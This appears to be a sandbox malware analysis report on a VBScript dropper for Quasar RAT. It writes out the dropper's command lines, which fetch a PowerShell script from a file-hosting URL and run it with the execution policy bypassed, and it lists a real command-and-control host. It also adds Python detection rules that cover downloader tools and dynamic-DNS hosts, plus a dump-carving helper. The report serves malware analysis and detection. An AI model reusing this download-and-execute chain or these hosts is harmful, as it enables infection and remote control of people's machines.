Malware Analysis Report

2025-04-14 05:06

Sample ID 230116-jl7vcsbf97
Target vb.vbs
SHA256 664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82
Tags: quasar office04 spyware trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82

Threat Level: Known bad

The file vb.vbs was found to be: Known bad.

Execution chain (from the behavioral2 run): WScript.exe runs vb.vbs, which spawns cmd.exe to fetch https://files.catbox.moe/nvz0g1.ps1 with curl and save it as C:\Users\Admin\AppData\Roaming\rr.ps1, then spawns a second cmd.exe that runs the downloaded script with powershell.exe -exec Bypass. PowerShell then writes into and sets the thread context of a freshly started, argument-less C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, i.e. it injects the Quasar payload into a signed Microsoft .NET utility (consistent with the RegAsm.exe memory regions listed under Files). The sandbox then records external IP lookups via api.ipify.org (tools.keycdn.com is also contacted) and a TCP connection to ghcc.duckdns.org (95.216.102.32) on port 4782, Quasar's default listener port. In the Windows 7 run (behavioral1) the chain stalled at the download step: curl.exe is not shipped with Windows 7, no curl.exe process was created, no network traffic was recorded and rr.ps1 never appeared on disk, so no Quasar payload was observed there.

Malicious Activity Summary

Tags: quasar office04 spyware trojan

Quasar RAT

Quasar payload

Checks computer location settings

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-01-16 07:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-01-16 07:46
Reported: 2023-01-16 07:51
Platform: win7-20221111-en
Max time kernel: 40s
Max time network: 29s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of WriteProcessMemory (identical rows collapsed; Hits is the number of times the event was recorded)

Source PID  Target PID  Hits  Source process                   Target process
2004        1424        3     C:\Windows\System32\WScript.exe  C:\Windows\System32\cmd.exe
1424        580         3     C:\Windows\System32\cmd.exe      C:\Windows\system32\cmd.exe
2004        1876        3     C:\Windows\System32\WScript.exe  C:\Windows\System32\cmd.exe
1876        1616        3     C:\Windows\System32\cmd.exe      C:\Windows\system32\cmd.exe
1616        1780        3     C:\Windows\system32\cmd.exe      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes (parent-child relationships reconstructed from the WriteProcessMemory PIDs above)

2004  C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"
  1424  C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
    580   C:\Windows\system32\cmd.exe
          cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
  1876  C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
    1616  C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
      1780  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

No curl.exe process was created in this run: curl.exe is not shipped with Windows 7, so the download stage failed, rr.ps1 was never written (it is absent from Files below) and the powershell.exe invocation had nothing to execute. This is why the Windows 7 run shows no Quasar signatures and no network activity.

Network

N/A

Files

memory/2004-54-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp

memory/1424-55-0x0000000000000000-mapping.dmp

memory/580-56-0x0000000000000000-mapping.dmp

memory/1876-57-0x0000000000000000-mapping.dmp

memory/1616-58-0x0000000000000000-mapping.dmp

memory/1780-59-0x0000000000000000-mapping.dmp

memory/1780-61-0x000007FEF3220000-0x000007FEF3C43000-memory.dmp

memory/1780-62-0x0000000002824000-0x0000000002827000-memory.dmp

memory/1780-63-0x000007FEF2600000-0x000007FEF315D000-memory.dmp

memory/1780-64-0x000000000282B000-0x000000000284A000-memory.dmp

memory/1780-65-0x0000000002824000-0x0000000002827000-memory.dmp

memory/1780-66-0x000000000282B000-0x000000000284A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2023-01-16 07:46
Reported: 2023-01-16 07:50
Platform: win10v2004-20220812-en
Max time kernel: 160s
Max time network: 208s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"

Signatures

Quasar RAT (tags: trojan spyware quasar)

Quasar payload (2 hits; no description, indicator, process or target recorded)

Checks computer location settings

Description        Indicator                                                                                              Process                          Target
Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  C:\Windows\System32\WScript.exe  N/A

Looks up external IP address via web service

Description  Indicator      Process  Target  Hits
N/A          api.ipify.org  N/A      N/A     2

Suspicious use of SetThreadContext

Description                          Indicator  Process                                                    Target
PID 4628 set thread context of 1644  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target  Hits
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A     2

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A
Token: SeDebugPrivilege  N/A        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe   N/A

Suspicious use of SetWindowsHookEx

Description  Indicator  Process                                                   Target
N/A          N/A        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  N/A

Suspicious use of WriteProcessMemory (identical rows collapsed; Hits is the number of times the event was recorded)

Source PID  Target PID  Hits  Source process                                             Target process
4496        4828        2     C:\Windows\System32\WScript.exe                            C:\Windows\System32\cmd.exe
4828        4780        2     C:\Windows\System32\cmd.exe                                C:\Windows\system32\cmd.exe
4780        4792        2     C:\Windows\system32\cmd.exe                                C:\Windows\system32\curl.exe
4496        4584        2     C:\Windows\System32\WScript.exe                            C:\Windows\System32\cmd.exe
4584        1996        2     C:\Windows\System32\cmd.exe                                C:\Windows\system32\cmd.exe
1996        4628        2     C:\Windows\system32\cmd.exe                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
4628        1644        8     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes (parent-child relationships reconstructed from the WriteProcessMemory PIDs above)

4496  C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"
  4828  C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
    4780  C:\Windows\system32\cmd.exe
          cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      4792  C:\Windows\system32\curl.exe
            curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
  4584  C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
    1996  C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
      4628  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        1644  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

RegAsm.exe is started with no arguments and is the target of the WriteProcessMemory and SetThreadContext events recorded above; that is how the Quasar payload ends up executing inside a signed Microsoft .NET utility rather than in powershell.exe itself. rr.ps1 (hashes under Files) is the stage that performs the injection.

Network

Country  Destination           Domain                       Proto
N/A      52.182.141.63:443     (none)                       tcp
N/A      93.184.221.240:80     (none)                       tcp
N/A      8.8.8.8:53            files.catbox.moe             udp
N/A      107.160.74.134:443    files.catbox.moe             tcp
N/A      93.184.221.240:80     (none)                       tcp
N/A      8.8.8.8:53            151.122.125.40.in-addr.arpa  udp
N/A      8.8.8.8:53            ghcc.duckdns.org             udp
N/A      95.216.102.32:4782    ghcc.duckdns.org             tcp
N/A      8.8.8.8:53            tools.keycdn.com             udp
N/A      185.172.148.96:443    tools.keycdn.com             tcp
N/A      8.8.8.8:53            api.ipify.org                udp
N/A      64.185.227.155:443    api.ipify.org                tcp
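The chain recorded in this run can be caught by a process-creation and API-monitoring feed without any Quasar-specific signature. The following Python is an added example, not part of the sandbox report: it rebuilds the behavioral2 events as constructed records (the flat record layout is an assumption, not any real EDR or Sysmon schema) and runs three process rules over them (a LOLBin downloader writing into AppData with a script host among its ancestors; PowerShell with the execution policy bypassed running a .ps1 from AppData; a process that both writes memory into and sets the thread context of another process) plus one network rule (Quasar's default port 4782 and a dynamic-DNS host). The downloader list (certutil.exe, bitsadmin.exe) and the dynamic-DNS suffix list go beyond what this sample used and are editorial generalizations.

```python
"""Detection logic for the WScript -> cmd -> curl -> powershell -> RegAsm chain in this report.

Added example, not part of the sandbox output. The records below are constructed from the
behavioral2 process list, the WriteProcessMemory/SetThreadContext signatures and the Network
table; the flat record layout is an assumption, not a real EDR or Sysmon schema.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
DL = r"curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1"
RUN = r"powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1"

# Constructed from the behavioral2 process tree; ppid 0 marks the sandbox root.
PROC_EVENTS = [
    ProcEvent(4496, 0, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"'),
    ProcEvent(4828, 4496, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c ' + DL),
    ProcEvent(4780, 4828, r"C:\Windows\system32\cmd.exe", "cmd.exe /c " + DL),
    ProcEvent(4792, 4780, r"C:\Windows\system32\curl.exe", DL),
    ProcEvent(4584, 4496, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c ' + RUN),
    ProcEvent(1996, 4584, r"C:\Windows\system32\cmd.exe", "cmd.exe /c " + RUN),
    ProcEvent(4628, 1996, PS, RUN),
    ProcEvent(1644, 4628, REGASM, '"' + REGASM + '"'),
]
# (source pid, target pid, api), constructed from the injection signatures.
INJECT_EVENTS = [(4628, 1644, "WriteProcessMemory"), (4628, 1644, "SetThreadContext")]
# (domain, ip, port, proto), constructed from the Network table; the report attributes no PID.
NET_EVENTS = [("ghcc.duckdns.org", "95.216.102.32", 4782, "tcp"),
              ("api.ipify.org", "64.185.227.155", 443, "tcp"),
              ("files.catbox.moe", "107.160.74.134", 443, "tcp")]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}   # editorial generalization
QUASAR_DEFAULT_PORT = 4782                                     # Quasar's default listener port
DYNDNS_SUFFIXES = (".duckdns.org",)                            # extend with other free DDNS providers


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def lineage(events, pid):
    """Image basenames from pid up to the root, e.g. ['curl.exe', 'cmd.exe', 'cmd.exe', 'wscript.exe']."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect_process_chain(events):
    """Process-level rules; each hit is (pid, rule name)."""
    alerts = []
    for e in events:
        name, cmd, ancestors = basename(e.image), e.cmdline.lower(), lineage(events, e.pid)[1:]
        # Rule 1: a LOLBin downloader writing into the user profile with a script host as an ancestor
        # (not just the parent: this sample puts two cmd.exe hops between WScript.exe and curl.exe).
        if name in DOWNLOADERS and "\\appdata\\" in cmd and SCRIPT_HOSTS & set(ancestors):
            alerts.append((e.pid, "lolbin-download-to-appdata-under-script-host"))
        # Rule 2: PowerShell with the execution policy bypassed, running a .ps1 from AppData.
        if name == "powershell.exe" and re.search(r"-(exec\w*|ep)\s+bypass", cmd) \
                and re.search(r"\\appdata\\.*\.ps1", cmd):
            alerts.append((e.pid, "powershell-bypass-running-appdata-script"))
    return alerts


def detect_injection(events, inject_events):
    """Flag a source that both writes memory into and sets the thread context of the same target,
    the pair this report shows for powershell.exe -> RegAsm.exe. Hits are (src, dst, target name)."""
    by_pid = {e.pid: e for e in events}
    apis_by_pair = {}
    for src, dst, api in inject_events:
        apis_by_pair.setdefault((src, dst), set()).add(api)
    return [(src, dst, basename(by_pid[dst].image) if dst in by_pid else None)
            for (src, dst), apis in apis_by_pair.items()
            if {"WriteProcessMemory", "SetThreadContext"} <= apis]


def detect_c2(net_events):
    """Network-level rule: Quasar's default port and/or a dynamic-DNS C2 host."""
    alerts = []
    for domain, ip, port, proto in net_events:
        reasons = []
        if proto == "tcp" and port == QUASAR_DEFAULT_PORT:
            reasons.append("quasar-default-port")
        if domain.endswith(DYNDNS_SUFFIXES):
            reasons.append("dynamic-dns-host")
        if reasons:
            alerts.append((domain, ip, port, reasons))
    return alerts


if __name__ == "__main__":
    for hit in detect_process_chain(PROC_EVENTS) + detect_injection(PROC_EVENTS, INJECT_EVENTS) + detect_c2(NET_EVENTS):
        print(hit)
```

Rule 1 keys on the full ancestor chain rather than the direct parent on purpose: a parent-only rule would see cmd.exe spawning curl.exe and miss the WScript.exe origin. The port-4782 check is a weak signal by itself, since the Quasar listener port is operator-configurable, and is meant to be combined with the process-level hits rather than used alone.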

Files

memory/4828-132-0x0000000000000000-mapping.dmp

memory/4780-133-0x0000000000000000-mapping.dmp

memory/4792-134-0x0000000000000000-mapping.dmp

memory/4584-135-0x0000000000000000-mapping.dmp

memory/1996-136-0x0000000000000000-mapping.dmp

memory/4628-137-0x0000000000000000-mapping.dmp

memory/4628-138-0x0000019043090000-0x00000190430B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\rr.ps1

MD5 7aad8bcb11ff3deab23cc311222fe265
SHA1 3d9a69c71e00aff947af949441220f18bad9e0d8
SHA256 c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512 f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

memory/4628-140-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp

memory/1644-142-0x000000000047E7AE-mapping.dmp

memory/4628-143-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

memory/1644-144-0x0000000005900000-0x0000000005EA4000-memory.dmp

memory/1644-145-0x0000000005350000-0x00000000053E2000-memory.dmp

memory/1644-146-0x00000000052E0000-0x00000000052EA000-memory.dmp

memory/1644-147-0x00000000066D0000-0x0000000006CE8000-memory.dmp

memory/1644-148-0x0000000005860000-0x00000000058B0000-memory.dmp

memory/1644-149-0x00000000062E0000-0x0000000006392000-memory.dmp

memory/1644-150-0x00000000075A0000-0x0000000007606000-memory.dmp
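Anyone who wants to carve the injected payload out of these dumps first has to decide which file holds it. The following Python is an added example, not part of the report: it parses the dump names, whose layout memory/<pid>-<seq>-<start>-<end>-memory.dmp and memory/<pid>-<seq>-<addr>-mapping.dmp is inferred from the Files listings on this page, and for the SetThreadContext target (PID 1644) picks out the region that starts at the conventional 32-bit image base 0x400000 or that contains one of that PID's mapping addresses. What the single-address mapping.dmp entries denote is not stated on the page; the example only uses them as addresses to test for containment. The listing is copied from the behavioral2 Files section above.

```python
"""Pick the likely injected image out of a sandbox memory-dump listing.

Added example, not part of the report. The file-name layout is inferred from the Files
lists on this page; the listing below is copied from behavioral2 and the target PID comes
from the SetThreadContext signature (powershell.exe 4628 -> RegAsm.exe 1644).
"""
import re
from collections import defaultdict

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+)-memory|-mapping)\.dmp$")

# Copied from the behavioral2 Files section; the .ps1 entry is omitted because it is not a dump.
FILES = """
memory/4628-137-0x0000000000000000-mapping.dmp
memory/4628-138-0x0000019043090000-0x00000190430B2000-memory.dmp
memory/4628-140-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp
memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp
memory/1644-142-0x000000000047E7AE-mapping.dmp
memory/4628-143-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp
memory/1644-144-0x0000000005900000-0x0000000005EA4000-memory.dmp
memory/1644-145-0x0000000005350000-0x00000000053E2000-memory.dmp
memory/1644-146-0x00000000052E0000-0x00000000052EA000-memory.dmp
memory/1644-147-0x00000000066D0000-0x0000000006CE8000-memory.dmp
memory/1644-148-0x0000000005860000-0x00000000058B0000-memory.dmp
memory/1644-149-0x00000000062E0000-0x0000000006392000-memory.dmp
memory/1644-150-0x00000000075A0000-0x0000000007606000-memory.dmp
""".split()

INJECTION_TARGET_PID = 1644   # from "PID 4628 set thread context of 1644"


def parse_dumps(names):
    """Return ({pid: [(start, end, filename), ...]}, {pid: [mapping address, ...]})."""
    regions, mappings = defaultdict(list), defaultdict(list)
    for name in names:
        m = DUMP_RE.match(name)
        if not m:
            continue                      # not a dump entry (e.g. a dropped file)
        pid, start = int(m["pid"]), int(m["start"], 16)
        if m["end"] is None:
            mappings[pid].append(start)
        else:
            regions[pid].append((start, int(m["end"], 16), name))
    return regions, mappings


def injected_image_candidates(regions, mappings, target_pid):
    """Regions in the injection target that look like a mapped PE image: they start at the
    classic 32-bit image base 0x400000 or contain one of the PID's mapping addresses."""
    out = []
    for start, end, name in regions.get(target_pid, []):
        hosts_mapping = any(start <= addr < end for addr in mappings.get(target_pid, []))
        if start == 0x400000 or hosts_mapping:
            out.append({"file": name, "start": start, "size": end - start,
                        "hosts_mapping": hosts_mapping})
    return out


if __name__ == "__main__":
    regs, maps = parse_dumps(FILES)
    for cand in injected_image_candidates(regs, maps, INJECTION_TARGET_PID):
        print(f"{cand['file']}  base=0x{cand['start']:X}  size=0x{cand['size']:X}  "
              f"contains mapping address: {cand['hosts_mapping']}")
```

For this listing the only candidate is memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp, a 0x84000-byte region at 0x400000 that also contains the 0x47E7AE mapping address; that is the file to feed to a PE parser or a Quasar config extractor. The powershell.exe dumps (PID 4628) do not qualify: none starts at 0x400000 and the only mapping address for that PID, 0x0, falls in no region.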